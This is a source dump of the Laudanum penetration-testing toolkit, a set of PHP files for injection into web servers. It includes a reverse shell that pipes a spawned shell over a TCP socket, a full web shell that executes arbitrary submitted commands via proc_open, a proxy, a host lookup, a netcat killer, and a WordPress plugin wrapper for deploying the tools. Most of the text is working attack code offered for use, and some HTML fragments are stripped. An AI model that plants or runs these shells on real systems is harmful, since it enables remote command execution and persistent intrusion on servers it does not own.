184 | else { 185 | echo ""; 186 | } 187 | ?> 188 |
NameDateSize
../
" . $f . "" . "
" . $f . "" . "" . number_format(@filesize($curdir . $f)) . "

Can't open directory

189 |
190 |
191 | Copyright © 2014, Kevin Johnson and the Laudanum team.
192 | Written by Tim Medin.
193 | Get the latest version at laudanum.secureideas.net. 194 |
195 | 196 | 197 | -------------------------------------------------------------------------------- /laudanum/php/host.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides a host lookup by ip address. 20 | *** Adapted from Laudanum dns.php by Jason Gillam 21 | *** 22 | ******************************************************************************** 23 | *** This program is free software; you can redistribute it and/or 24 | *** modify it under the terms of the GNU General Public License 25 | *** as published by the Free Software Foundation; either version 2 26 | *** of the License, or (at your option) any later version. 27 | *** 28 | *** This program is distributed in the hope that it will be useful, 29 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 30 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 31 | *** GNU General Public License for more details. 32 | *** 33 | *** You can get a copy of the GNU General Public License from this 34 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 35 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 36 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 37 | *** 38 | ***************************************************************************** */ 39 | 40 | // ***************** Config entries below *********************** 41 | 42 | // IPs are enterable as individual addresses TODO: add CIDR support 43 | $allowedIPs = array("19.168.2.16", "192.168.1.100"); 44 | 45 | # *********** No editable content below this line ************** 46 | 47 | $allowed = 0; 48 | foreach ($allowedIPs as $IP) { 49 | if ($_SERVER["REMOTE_ADDR"] == $IP) 50 | $allowed = 1; 51 | } 52 | 53 | if ($allowed == 0) { 54 | header("HTTP/1.0 404 Not Found"); 55 | die(); 56 | } 57 | 58 | 59 | /* This error handler will turn all notices, warnings, and errors into fatal 60 | * errors, unless they have been suppressed with the @-operator. */ 61 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 62 | /* The @-opertor (used with chdir() below) temporarely makes 63 | * error_reporting() return zero, and we don't want to die in that case. 64 | * We do note the error in the output, though. */ 65 | if (error_reporting() == 0) { 66 | $_SESSION['output'] .= $errstr . "\n"; 67 | } else { 68 | die(' 70 | 71 | 72 | Laudanum PHP Hostname by IP Lookup 73 | 74 | 75 |

Fatal Error!

76 |

' . $errstr . '

77 |

in ' . $errfile . ', line ' . $errline . '.

78 | 79 |
80 |
81 | Copyright © 2014, Kevin Johnson and the Laudanum team.
82 | Written by Tim Medin.
83 | Get the latest version at laudanum.secureideas.net. 84 |
85 | 86 | 87 | '); 88 | } 89 | } 90 | 91 | set_error_handler('error_handler'); 92 | 93 | 94 | /* Initialize some variables we need again and again. */ 95 | $query = isset($_POST['query']) ? $_POST['query'] : ''; 96 | $type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY'; 97 | ?> 98 | 100 | 101 | 102 | Laudanum Host Lookup 103 | 104 | 105 | 110 | 111 | 112 | 113 |

Host Lookup 0.1

114 |
115 |
116 | Host Lookup: 117 |

IP: 118 | 119 | 120 |

121 |
122 | 123 | 124 | "; 129 | echo "Result = "; 130 | print_r($result); 131 | echo ""; 132 | } 133 | ?> 134 |
135 |
136 | Copyright © 2014, Kevin Johnson and the Laudanum team.
137 | Written by Tim Medin.
138 | Get the latest version at laudanum.secureideas.net. 139 |
140 | 141 | 142 | 143 | -------------------------------------------------------------------------------- /laudanum/php/killnc.php: -------------------------------------------------------------------------------- 1 | 13 | *** Tim Medin 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file attempts to kill all netcat processes spawned by the current user. 20 | *** This may be useful in cases where a reverse shell attempt has gone wrong. 21 | *** 22 | *** Written by Jason Gillam 23 | *** 24 | ******************************************************************************** 25 | *** This program is free software; you can redistribute it and/or 26 | *** modify it under the terms of the GNU General Public License 27 | *** as published by the Free Software Foundation; either version 2 28 | *** of the License, or (at your option) any later version. 29 | *** 30 | *** This program is distributed in the hope that it will be useful, 31 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 32 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 33 | *** GNU General Public License for more details. 34 | *** 35 | *** You can get a copy of the GNU General Public License from this 36 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 37 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 38 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 39 | *** 40 | ***************************************************************************** */ 41 | 42 | 43 | // ***************** Config entries below *********************** 44 | 45 | // IPs are enterable as individual addresses TODO: add CIDR support 46 | $allowedIPs = array("19.168.2.16", "192.168.1.100"); 47 | 48 | # *********** No editable content below this line ************** 49 | 50 | $allowed = 0; 51 | foreach ($allowedIPs as $IP) { 52 | if ($_SERVER["REMOTE_ADDR"] == $IP) 53 | $allowed = 1; 54 | } 55 | 56 | if ($allowed == 0) { 57 | header("HTTP/1.0 404 Not Found"); 58 | die(); 59 | } 60 | 61 | 62 | /* This error handler will turn all notices, warnings, and errors into fatal 63 | * errors, unless they have been suppressed with the @-operator. */ 64 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 65 | /* The @-opertor (used with chdir() below) temporarely makes 66 | * error_reporting() return zero, and we don't want to die in that case. 67 | * We do note the error in the output, though. */ 68 | if (error_reporting() == 0) { 69 | $_SESSION['output'] .= $errstr . "\n"; 70 | } else { 71 | die(' 73 | 74 | 75 | Laudanum PHP Hostname by IP Lookup 76 | 77 | 78 |

Fatal Error!

79 |

' . $errstr . '

80 |

in ' . $errfile . ', line ' . $errline . '.

81 | 82 |
83 |
84 | Copyright © 2014, Kevin Johnson and the Laudanum team.
85 | Written by Tim Medin.
86 | Get the latest version at laudanum.secureideas.net. 87 |
88 | 89 | 90 | '); 91 | } 92 | } 93 | 94 | set_error_handler('error_handler'); 95 | 96 | 97 | 98 | ?> 99 | 101 | 102 | 103 | Laudanum Kill nc 104 | 105 | 106 | 107 | 108 |

Kill nc 0.1

109 | 110 | 111 |
112 |
113 | Copyright © 2014, Kevin Johnson and the Laudanum team.
114 | Written by Tim Medin.
115 | Get the latest version at laudanum.secureideas.net. 116 |
117 | 118 | 119 | 120 | -------------------------------------------------------------------------------- /laudanum/php/php-reverse-shell.php: -------------------------------------------------------------------------------- 1 | array("pipe", "r"), // stdin is a pipe that the child will read from 109 | 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 110 | 2 => array("pipe", "w") // stderr is a pipe that the child will write to 111 | ); 112 | 113 | $process = proc_open($shell, $descriptorspec, $pipes); 114 | 115 | if (!is_resource($process)) { 116 | printit("ERROR: Can't spawn shell"); 117 | exit(1); 118 | } 119 | 120 | // Set everything to non-blocking 121 | // Reason: Occsionally reads will block, even though stream_select tells us they won't 122 | stream_set_blocking($pipes[0], 0); 123 | stream_set_blocking($pipes[1], 0); 124 | stream_set_blocking($pipes[2], 0); 125 | stream_set_blocking($sock, 0); 126 | 127 | printit("Successfully opened reverse shell to $ip:$port"); 128 | 129 | while (1) { 130 | // Check for end of TCP connection 131 | if (feof($sock)) { 132 | printit("ERROR: Shell connection terminated"); 133 | break; 134 | } 135 | 136 | // Check for end of STDOUT 137 | if (feof($pipes[1])) { 138 | printit("ERROR: Shell process terminated"); 139 | break; 140 | } 141 | 142 | // Wait until a command is end down $sock, or some 143 | // command output is available on STDOUT or STDERR 144 | $read_a = array($sock, $pipes[1], $pipes[2]); 145 | $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 146 | 147 | // If we can read from the TCP socket, send 148 | // data to process's STDIN 149 | if (in_array($sock, $read_a)) { 150 | if ($debug) printit("SOCK READ"); 151 | $input = fread($sock, $chunk_size); 152 | if ($debug) printit("SOCK: $input"); 153 | fwrite($pipes[0], $input); 154 | } 155 | 156 | // If we can read from the process's STDOUT 157 | // send data down tcp connection 158 | if (in_array($pipes[1], $read_a)) { 159 | if ($debug) printit("STDOUT READ"); 160 | $input = fread($pipes[1], $chunk_size); 161 | if ($debug) printit("STDOUT: $input"); 162 | fwrite($sock, $input); 163 | } 164 | 165 | // If we can read from the process's STDERR 166 | // send data down tcp connection 167 | if (in_array($pipes[2], $read_a)) { 168 | if ($debug) printit("STDERR READ"); 169 | $input = fread($pipes[2], $chunk_size); 170 | if ($debug) printit("STDERR: $input"); 171 | fwrite($sock, $input); 172 | } 173 | } 174 | 175 | fclose($sock); 176 | fclose($pipes[0]); 177 | fclose($pipes[1]); 178 | fclose($pipes[2]); 179 | proc_close($process); 180 | 181 | // Like print, but does nothing if we've daemonised ourself 182 | // (I can't figure out how to redirect STDOUT like a proper daemon) 183 | function printit ($string) { 184 | if (!$daemon) { 185 | print "$string\n"; 186 | } 187 | } 188 | 189 | ?> 190 | 191 | 192 | 193 | -------------------------------------------------------------------------------- /laudanum/php/proxy.php: -------------------------------------------------------------------------------- 1 | 15 | *** 16 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 17 | *** 18 | ******************************************************************************** 19 | *** 20 | *** This file allows browsing of the file system. 21 | *** Written by Tim Medin 22 | *** 23 | ******************************************************************************** 24 | *** This program is free software; you can redistribute it and/or 25 | *** modify it under the terms of the GNU General Public License 26 | *** as published by the Free Software Foundation; either version 2 27 | *** of the License, or (at your option) any later version. 28 | *** 29 | *** This program is distributed in the hope that it will be useful, 30 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 31 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 32 | *** GNU General Public License for more details. 33 | *** 34 | *** You can get a copy of the GNU General Public License from this 35 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 36 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 37 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 38 | *** 39 | ***************************************************************************** */ 40 | 41 | // TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page 42 | // figure out how to reuse sessionid from the remote site 43 | 44 | // ***************** Config entries below *********************** 45 | 46 | // IPs are enterable as individual addresses TODO: add CIDR support 47 | $allowedIPs = array("19.168.2.16", "192.168.1.100","127.0.0.1","192.168.10.129","192.168.10.1"); 48 | 49 | # *********** No editable content below this line ************** 50 | 51 | $allowed = 0; 52 | foreach ($allowedIPs as $IP) { 53 | if ($_SERVER["REMOTE_ADDR"] == $IP) 54 | $allowed = 1; 55 | } 56 | 57 | if ($allowed == 0) { 58 | header("HTTP/1.0 404 Not Found"); 59 | die(); 60 | } 61 | 62 | /* This error handler will turn all notices, warnings, and errors into fatal 63 | * errors, unless they have been suppressed with the @-operator. */ 64 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 65 | /* The @-opertor (used with chdir() below) temporarely makes 66 | * error_reporting() return zero, and we don't want to die in that case. 67 | * We do note the error in the output, though. */ 68 | if (error_reporting() == 0) { 69 | $_SESSION['output'] .= $errstr . "\n"; 70 | } else { 71 | die(' 73 | 74 | 75 | Laudanum PHP Proxy 76 | 77 | 78 |

Fatal Error!

79 |

' . $errstr . '

80 |

in ' . $errfile . ', line ' . $errline . '.

81 | 82 |
83 |
84 | Copyright © 2014, Kevin Johnson and the Laudanum team.
85 | Written by Tim Medin.
86 | Get the latest version at laudanum.secureideas.net. 87 |
88 | 89 | 90 | '); 91 | } 92 | } 93 | 94 | set_error_handler('error_handler'); 95 | 96 | function geturlarray($u) { 97 | // creates the url array, addes a scheme if it is missing and retries parsing 98 | $o = parse_url($u); 99 | if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); } 100 | if (!isset($o["path"])) { $o["path"] = "/"; } 101 | return $o; 102 | } 103 | 104 | function buildurl ($u) { 105 | // build the url from the url array 106 | // this is used because the built in function isn't 107 | // avilable in all installs of php 108 | if (!isset($u["host"])) { return null; } 109 | 110 | $s = isset($u["scheme"]) ? $u["scheme"] : "http"; 111 | $s .= "://" . $u["host"]; 112 | $s .= isset($u["port"]) ? ":" . $u["port"] : ""; 113 | $s .= isset($u["path"]) ? $u["path"] : "/"; 114 | $s .= isset($u["query"]) ? "?" . $u["query"] : ""; 115 | $s .= isset($u["fragment"]) ? "#" . $u["fragment"] : ""; 116 | return $s; 117 | } 118 | 119 | function buildurlpath ($u) { 120 | //gets the full url and attempts to remove the file at the end of the url 121 | // e.g. http://blah.com/dir/file.ext => http://blah.com/dir/ 122 | if (!isset($u["host"])) { return null; } 123 | 124 | $s = isset($u["scheme"])? $u["scheme"] : "http"; 125 | $s .= "://" . $u["host"]; 126 | $s .= isset($u["port"]) ? ":" . $u["port"] : ""; 127 | 128 | $path = isset($u["path"]) ? $u["path"] : "/"; 129 | // is the last portion of the path a file or a dir? 130 | // assume if there is a . it is a file 131 | // if it ends in a / then it is a dir 132 | // if neither, than assume dir 133 | $dirs = explode("/", $path); 134 | $last = $dirs[count($dirs) - 1]; 135 | if (preg_match('/\./', $last) || !preg_match('/\/$/', $last)) { 136 | // its a file, remove the last chunk 137 | $path = substr($path, 0, -1 * strlen($last)); 138 | } 139 | 140 | $s .= $path; 141 | return $s; 142 | } 143 | 144 | function getfilename ($u) { 145 | // returns the file name 146 | // e.g. http://blah.com/dir/file.ext returns file.ext 147 | // technically, it is the last portion of the url, so there is a potential 148 | // for a problem if a http://blah.com/dir returns a file 149 | $s = explode("/", $u["path"]); 150 | return $s[count($s) - 1]; 151 | } 152 | 153 | function getcontenttype ($headers) { 154 | // gets the content type 155 | foreach($headers as $h) { 156 | if (preg_match_all("/^Content-Type: (.*)$/", $h, $out)) { 157 | return $out[1][0]; 158 | } 159 | } 160 | } 161 | 162 | function getcontentencoding ($headers) { 163 | foreach ($headers as $h) { 164 | if (preg_match_all("/^Content-Encoding: (.*)$/", $h, $out)) { 165 | return $out[1][0]; 166 | } 167 | } 168 | } 169 | 170 | function removeheader($header, $headers) { 171 | foreach (array_keys($headers) as $key) { 172 | if (preg_match_all("/^" . $header . ": (.*)$/", $headers[$key], $out)) { 173 | unset($headers[$key]); 174 | return $headers; 175 | } 176 | } 177 | } 178 | 179 | function rewritecookies($headers) { 180 | // removes the path and domain from cookies 181 | for ($i = 0; $i < count($headers); $i++) { 182 | if (preg_match_all("/^Set-Cookie:/", $headers[$i], $out)) { 183 | $headers[$i] = preg_replace("/domain=[^[:space:]]+/", "", $headers[$i]); 184 | $headers[$i] = preg_replace("/path=[^[:space:]]+/", "", $headers[$i]); 185 | } 186 | } 187 | return $headers; 188 | } 189 | 190 | function getsessionid($headers) { 191 | for ($i = 0; $i < count($headers); $i++) { 192 | if (preg_match_all("/^Set-Cookie: SessionID=([a-zA-Z0-9]+);/", $headers[$i], $out)) 193 | return $out[1][0]; 194 | } 195 | return "0"; 196 | } 197 | 198 | function compatible_gzinflate($gzData) { 199 | if ( substr($gzData, 0, 3) == "\x1f\x8b\x08" ) { 200 | $i = 10; 201 | $flg = ord( substr($gzData, 3, 1) ); 202 | if ( $flg > 0 ) { 203 | if ( $flg & 4 ) { 204 | list($xlen) = unpack('v', substr($gzData, $i, 2) ); 205 | $i = $i + 2 + $xlen; 206 | } 207 | if ( $flg & 8 ) 208 | $i = strpos($gzData, "\0", $i) + 1; 209 | if ( $flg & 16 ) 210 | $i = strpos($gzData, "\0", $i) + 1; 211 | if ( $flg & 2 ) 212 | $i = $i + 2; 213 | } 214 | return @gzinflate( substr($gzData, $i, -8) ); 215 | } else { 216 | return false; 217 | } 218 | return false; 219 | } 220 | 221 | function rewrite ($d, $u) { 222 | $r = $d; 223 | //rewrite images and links - absolute reference 224 | $r = preg_replace("/((src|href).?=.?['\"]?)(\/[^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . $u["scheme"] . "://" . $u["host"] . "\\3", $r); 225 | //rewrite images and links - hard linked 226 | $r = preg_replace("/((src|href).?=.?['\"])(http[^'\"]+['\"])/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . "\\3", $r); 227 | //rewrite images and links - relative reference 228 | $r = preg_replace("/((src|href).?=.?['\"])([^\/][^'\"[:space:]]+['\"]?)/", "\\1" . $_SERVER["PHP_SELF"] . "?laudurl=" . buildurlpath($u) . "\\3", $r); 229 | 230 | 231 | //rewrite form - absolute reference 232 | $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); 233 | //rewrite form - hard linked 234 | $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); 235 | //rewrite form - relative reference 236 | $r = preg_replace("/(]*?)>/", "\\1" . $_SERVER["PHP_SELF"] . "\\4>", $r); 237 | return $r; 238 | } 239 | 240 | /* Initialize some variables we need again and again. */ 241 | $url = isset($_GET["laudurl"]) ? $_GET["laudurl"] : ""; 242 | if ($url == "") { 243 | $url = isset($_POST["laudurl"]) ? $_POST["laudurl"] : ""; 244 | } 245 | 246 | if ($url == "") { 247 | ?> 248 | 250 | 251 | 252 | Laudanum PHP Proxy 253 | 254 | 255 | 260 | 261 | 262 | 263 |

Laudanum PHP Proxy

264 | 265 |
266 | 267 | 268 |
269 |
270 |
271 | Copyright © 2014, Kevin Johnson and the Laudanum team.
272 | Written by Tim Medin.
273 | Get the latest version at laudanum.secureideas.net. 274 |
275 | 276 | 277 | 278 | 352 | -------------------------------------------------------------------------------- /laudanum/php/shell.php: -------------------------------------------------------------------------------- 1 | 13 | *** Tim Medin 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides shell access to the system. It is built based on the 2.1 20 | *** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler 21 | *** 22 | *** 23 | *** Updated by Tim Medin 24 | *** 25 | ******************************************************************************** 26 | *** This program is free software; you can redistribute it and/or 27 | *** modify it under the terms of the GNU General Public License 28 | *** as published by the Free Software Foundation; either version 2 29 | *** of the License, or (at your option) any later version. 30 | *** 31 | *** This program is distributed in the hope that it will be useful, 32 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 33 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 34 | *** GNU General Public License for more details. 35 | *** 36 | *** You can get a copy of the GNU General Public License from this 37 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 38 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 39 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 40 | *** 41 | ***************************************************************************** */ 42 | 43 | // ***************** Config entries below *********************** 44 | 45 | // IPs are enterable as individual addresses TODO: add CIDR support 46 | $allowedIPs = array("192.168.1.55", "12.2.2.2"); 47 | 48 | # format is "username" => "password" 49 | # password is generated using sha1sum as shown below (don't forget the -n, KEVIN!) 50 | # echo -n Password1 | sha1sum 51 | $users = array("kevin" => "b441ac06613fc8d63795be9ad0beaf55011936ac", "tim" => "a94a1fe5ccb19ba61c4c0873d391e987982fbbd3", "yomamma" => "a94a1fe5ccb19ba61c4c0873d391e987982fbbd3"); 52 | 53 | # *********** No editable content below this line ************** 54 | 55 | $allowed = 0; 56 | foreach ($allowedIPs as $IP) { 57 | if ($_SERVER["REMOTE_ADDR"] == $IP) 58 | $allowed = 1; 59 | } 60 | 61 | if ($allowed == 0) { 62 | header("HTTP/1.0 404 Not Found"); 63 | die(); 64 | } 65 | 66 | 67 | 68 | /* This error handler will turn all notices, warnings, and errors into fatal 69 | * errors, unless they have been suppressed with the @-operator. */ 70 | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) { 71 | /* The @-opertor (used with chdir() below) temporarely makes 72 | * error_reporting() return zero, and we don't want to die in that case. 73 | * We do note the error in the output, though. */ 74 | if (error_reporting() == 0) { 75 | $_SESSION['output'] .= $errstr . "\n"; 76 | } else { 77 | die(' 79 | 80 | 81 | Laudanum PHP Shell Access 82 | 83 | 84 |

Fatal Error!

85 |

' . $errstr . '

86 |

in ' . $errfile . ', line ' . $errline . '.

87 | 88 |
89 |
90 | Copyright © 2014, Kevin Johnson and the Laudanum team.
92 | Get the latest version at laudanum.secureideas.net. 93 |
94 | 95 | 96 | '); 97 | } 98 | } 99 | 100 | set_error_handler('error_handler'); 101 | 102 | 103 | function logout() { 104 | $_SESSION = array('authenticated' => false); 105 | if (isset($_COOKIE[session_name()])) 106 | setcookie(session_name(), '', time()-42000, '/'); 107 | session_destroy(); 108 | } 109 | 110 | 111 | function stripslashes_deep($value) { 112 | if (is_array($value)) 113 | return array_map('stripslashes_deep', $value); 114 | else 115 | return stripslashes($value); 116 | } 117 | 118 | if (get_magic_quotes_gpc()) 119 | $_POST = stripslashes_deep($_POST); 120 | 121 | /* Initialize some variables we need again and again. */ 122 | $username = isset($_POST['username']) ? $_POST['username'] : ''; 123 | $password = isset($_POST['password']) ? $_POST['password'] : ''; 124 | $nounce = isset($_POST['nounce']) ? $_POST['nounce'] : ''; 125 | 126 | $command = isset($_POST['command']) ? $_POST['command'] : ''; 127 | $rows = isset($_POST['rows']) ? $_POST['rows'] : 24; 128 | $columns = isset($_POST['columns']) ? $_POST['columns'] : 80; 129 | 130 | 131 | ///* Default settings --- these settings should always be set to something. */ 132 | //$default_settings = array('home-directory' => '.'); 133 | 134 | ///* Merge settings. */ 135 | //$ini['settings'] = array_merge($default_settings, $ini['settings']); 136 | 137 | 138 | session_start(); 139 | 140 | /* Delete the session data if the user requested a logout. This leaves the 141 | * session cookie at the user, but this is not important since we 142 | * authenticates on $_SESSION['authenticated']. */ 143 | if (isset($_POST['logout'])) 144 | logout(); 145 | 146 | ///* Attempt authentication. */ 147 | //if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && 148 | // isset($ini['users'][$username])) { 149 | // if (strchr($ini['users'][$username], ':') === false) { 150 | // // No seperator found, assume this is a password in clear text. 151 | // $_SESSION['authenticated'] = ($ini['users'][$username] == $password); 152 | // } else { 153 | // list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]); 154 | // $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash); 155 | // } 156 | //} 157 | 158 | /* Attempt authentication. */ 159 | if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username])) 160 | $_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password)); 161 | 162 | /* Enforce default non-authenticated state if the above code didn't set it 163 | * already. */ 164 | if (!isset($_SESSION['authenticated'])) 165 | $_SESSION['authenticated'] = false; 166 | 167 | if ($_SESSION['authenticated']) { 168 | /* Initialize the session variables. */ 169 | if (empty($_SESSION['cwd'])) { 170 | $_SESSION['cwd'] = '.'; 171 | $_SESSION['history'] = array(); 172 | $_SESSION['output'] = ''; 173 | } 174 | 175 | if (!empty($command)) { 176 | /* Save the command for late use in the JavaScript. If the command is 177 | * already in the history, then the old entry is removed before the 178 | * new entry is put into the list at the front. */ 179 | if (($i = array_search($command, $_SESSION['history'])) !== false) 180 | unset($_SESSION['history'][$i]); 181 | 182 | array_unshift($_SESSION['history'], $command); 183 | 184 | /* Now append the commmand to the output. */ 185 | $_SESSION['output'] .= '$ ' . $command . "\n"; 186 | 187 | /* Initialize the current working directory. */ 188 | if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) { 189 | $_SESSION['cwd'] = realpath($ini['settings']['home-directory']); 190 | } elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) { 191 | /* The current command is a 'cd' command which we have to handle 192 | * as an internal shell command. */ 193 | 194 | if ($regs[1]{0} == '/') { 195 | /* Absolute path, we use it unchanged. */ 196 | $new_dir = $regs[1]; 197 | } else { 198 | /* Relative path, we append it to the current working 199 | * directory. */ 200 | $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; 201 | } 202 | 203 | /* Transform '/./' into '/' */ 204 | while (strpos($new_dir, '/./') !== false) 205 | $new_dir = str_replace('/./', '/', $new_dir); 206 | 207 | /* Transform '//' into '/' */ 208 | while (strpos($new_dir, '//') !== false) 209 | $new_dir = str_replace('//', '/', $new_dir); 210 | 211 | /* Transform 'x/..' into '' */ 212 | while (preg_match('|/\.\.(?!\.)|', $new_dir)) 213 | $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); 214 | 215 | if ($new_dir == '') $new_dir = '/'; 216 | 217 | /* Try to change directory. */ 218 | if (@chdir($new_dir)) { 219 | $_SESSION['cwd'] = $new_dir; 220 | } else { 221 | $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; 222 | } 223 | 224 | } elseif (trim($command) == 'exit') { 225 | logout(); 226 | } else { 227 | 228 | /* The command is not an internal command, so we execute it after 229 | * changing the directory and save the output. */ 230 | chdir($_SESSION['cwd']); 231 | 232 | // We canot use putenv() in safe mode. 233 | if (!ini_get('safe_mode')) { 234 | // Advice programs (ls for example) of the terminal size. 235 | putenv('ROWS=' . $rows); 236 | putenv('COLUMNS=' . $columns); 237 | } 238 | 239 | /* Alias expansion. */ 240 | $length = strcspn($command, " \t"); 241 | $token = substr($command, 0, $length); 242 | if (isset($ini['aliases'][$token])) 243 | $command = $ini['aliases'][$token] . substr($command, $length); 244 | 245 | $io = array(); 246 | $p = proc_open($command, 247 | array(1 => array('pipe', 'w'), 248 | 2 => array('pipe', 'w')), 249 | $io); 250 | 251 | /* Read output sent to stdout. */ 252 | while (!feof($io[1])) { 253 | $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), 254 | ENT_COMPAT, 'UTF-8'); 255 | } 256 | /* Read output sent to stderr. */ 257 | while (!feof($io[2])) { 258 | $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), 259 | ENT_COMPAT, 'UTF-8'); 260 | } 261 | 262 | fclose($io[1]); 263 | fclose($io[2]); 264 | proc_close($p); 265 | } 266 | } 267 | 268 | /* Build the command history for use in the JavaScript */ 269 | if (empty($_SESSION['history'])) { 270 | $js_command_hist = '""'; 271 | } else { 272 | $escaped = array_map('addslashes', $_SESSION['history']); 273 | $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; 274 | } 275 | } 276 | 277 | ?> 278 | 280 | 281 | 282 | Laudanum Shell 283 | 284 | 285 | 323 | 324 | 325 | 326 | 327 |

Laudanum Shell

328 | 329 |
330 | 331 | 340 | 341 |
342 | Authentication 343 | 344 | Login failed, please try again:

' . "\n"; 347 | else 348 | echo "

Please login:

\n"; 349 | ?> 350 | 351 |

Username:

353 | 354 |

Password:

355 | 356 |

357 | 358 | 359 | 360 |
361 | 362 | 363 | 364 |
365 | Current Working Directory: 368 | 369 | 370 |
371 | 378 |

379 | $  381 |

382 |
383 | 384 |

385 | Size: × 389 | 390 | 391 | 392 |

393 | 394 |
395 | 396 | 397 | 398 |
399 | 400 | 401 |
402 |
403 | Copyright © 2014, Kevin Johnson and the Laudanum team.
404 | Updated by Tim Medin.
405 | Get the latest version at laudanum.secureideas.net. 406 |
407 | 408 | 409 | 410 | -------------------------------------------------------------------------------- /laudanum/wordpress/laudanum.php: -------------------------------------------------------------------------------- 1 | 21 | *** Tim Medin 22 | *** 23 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 24 | *** 25 | ******************************************************************************** 26 | *** 27 | *** This file is a Word Press plugin wrapper for Laudanum's PHP tools. As with 28 | *** other Word Press plugins, this entire directory should be zipped up for deployment. 29 | *** The templates/ipcheck.php file should be updated with the tester's IP address first. 30 | *** 31 | *** Written by Jason Gillam 32 | *** 33 | ******************************************************************************** 34 | *** This program is free software; you can redistribute it and/or 35 | *** modify it under the terms of the GNU General Public License 36 | *** as published by the Free Software Foundation; either version 2 37 | *** of the License, or (at your option) any later version. 38 | *** 39 | *** This program is distributed in the hope that it will be useful, 40 | *** but WITHOUT ANY WARRANTY; without even the implied warranty of 41 | *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 42 | *** GNU General Public License for more details. 43 | *** 44 | *** You can get a copy of the GNU General Public License from this 45 | *** address: http://www.gnu.org/copyleft/gpl.html#SEC1 46 | *** You can also write to the Free Software Foundation, Inc., 59 Temple 47 | *** Place - Suite 330, Boston, MA 02111-1307, USA. 48 | *** 49 | ***************************************************************************** */ 50 | 51 | if(!class_exists("WP_Laudanum")) 52 | { 53 | class WP_Laudanum 54 | { 55 | 56 | public function __construct() 57 | { 58 | add_action('admin_menu', array(&$this, 'add_menu')); 59 | } 60 | 61 | public function __activate() 62 | { 63 | 64 | } 65 | 66 | public function __deactivate() 67 | { 68 | 69 | } 70 | 71 | public function add_menu() 72 | { 73 | add_options_page('Laudanum Settings', 'Laudanum', 'manage_options', 'wp_laudanum', array(&$this, 'plugin_settings_page')); 74 | } 75 | 76 | public function plugin_settings_page() 77 | { 78 | if(!current_user_can('manage_options')) 79 | { 80 | wp_die(__('You do not have sufficient permissions to access this page.')); 81 | } 82 | 83 | include(sprintf("%s/templates/settings.php", dirname(__FILE__))); 84 | } 85 | } 86 | 87 | register_activation_hook(__FILE__, array('WP_Laudanum', 'activate')); 88 | register_deactivation_hook(__FILE__, array('WP_Laudanum', 'deactivate')); 89 | 90 | $wp_laudanum = new WP_Laudanum(); 91 | 92 | if(isset($wp_laudanum)) { 93 | function plugin_settings_link($links) 94 | { 95 | $settings_link = 'Settings'; 96 | array_unshift($links, $settings_link); 97 | return $links; 98 | } 99 | 100 | $plugin = plugin_basename(__FILE__); 101 | add_filter("plugin_action_links_$plugin", 'plugin_settings_link'); 102 | } 103 | 104 | } 105 | 106 | 107 | 108 | ?> -------------------------------------------------------------------------------- /laudanum/wordpress/templates/dns.php: -------------------------------------------------------------------------------- 1 | 14 | *** 15 | *** Copyright 2014 by Kevin Johnson and the Laudanum Team 16 | *** 17 | ******************************************************************************** 18 | *** 19 | *** This file provides access to DNS on the system. 20 | 